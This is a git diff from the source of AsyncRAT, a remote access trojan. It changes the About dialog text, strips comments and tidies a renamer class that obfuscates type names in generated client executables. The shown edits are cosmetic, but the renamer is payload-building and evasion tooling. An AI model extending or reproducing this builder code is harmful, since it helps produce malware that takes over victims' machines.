diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormAbout.Designer.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormAbout.Designer.cs index a6b3f93..133a158 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormAbout.Designer.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormAbout.Designer.cs @@ -42,16 +42,18 @@ this.richTextBox1.Name = "richTextBox1"; this.richTextBox1.ReadOnly = true; this.richTextBox1.ShortcutsEnabled = false; - this.richTextBox1.Size = new System.Drawing.Size(526, 253); + this.richTextBox1.Size = new System.Drawing.Size(526, 182); this.richTextBox1.TabIndex = 0; - this.richTextBox1.Text = resources.GetString("richTextBox1.Text"); + this.richTextBox1.Text = "\n │ Author : NYAN CAT\n │ Name : AsyncRAT © 2019\n │ C" + + "ontact : github.com/NYAN-x-CAT\n\n This program is distributed for educat" + + "ional purposes only.\n\n"; this.richTextBox1.ZoomFactor = 1.1F; // // FormAbout // this.AutoScaleDimensions = new System.Drawing.SizeF(9F, 20F); this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font; - this.ClientSize = new System.Drawing.Size(526, 253); + this.ClientSize = new System.Drawing.Size(526, 182); this.Controls.Add(this.richTextBox1); this.Icon = ((System.Drawing.Icon)(resources.GetObject("$this.Icon"))); this.MaximizeBox = false; diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormAbout.resx b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormAbout.resx index 9804f8a..f4aca47 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormAbout.resx +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormAbout.resx @@ -117,18 +117,6 @@ System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 - - - │ Author : NYAN CAT - │ Name : AsyncRAT © 2019 - │ Contact : github.com/NYAN-x-CAT - - This program is distributed for educational purposes only. - - #Credits; - MessagePack @ymofen - StreamLibrary @Dergan - diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormBuilder.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormBuilder.cs index 6502432..b75840d 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormBuilder.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormBuilder.cs @@ -36,7 +36,6 @@ namespace AsyncRAT_Sharp.Forms if (!r.Perform()) throw new Exception("renaming failed"); - // PHASE 3 - Saving using (SaveFileDialog saveFileDialog1 = new SaveFileDialog()) { saveFileDialog1.Filter = ".exe (*.exe)|*.exe"; diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Helper/BuildRenamer.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Helper/BuildRenamer.cs index f8ddf71..b516823 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Helper/BuildRenamer.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Helper/BuildRenamer.cs @@ -8,11 +8,9 @@ using System.Threading.Tasks; namespace AsyncRAT_Sharp.Helper { + //creadit Quasar.Server/Build/Renamer.cs public class Renamer { - /// - /// Contains the assembly definition. - /// public AssemblyDefinition AsmDef { get; set; } private int Length { get; set; } @@ -36,10 +34,6 @@ namespace AsyncRAT_Sharp.Helper _eventOverloaders = new Dictionary(); } - /// - /// Attempts to modify the assembly definition data. - /// - /// True if the operation succeeded; False if the operation failed. public bool Perform() { try @@ -58,7 +52,7 @@ namespace AsyncRAT_Sharp.Helper private void RenameInType(TypeDefinition typeDef) { - if (!typeDef.Namespace.StartsWith("Client") /* || typeDef.HasInterfaces */) + if (!typeDef.Namespace.StartsWith("Client")) return; _typeOverloader.GiveName(typeDef);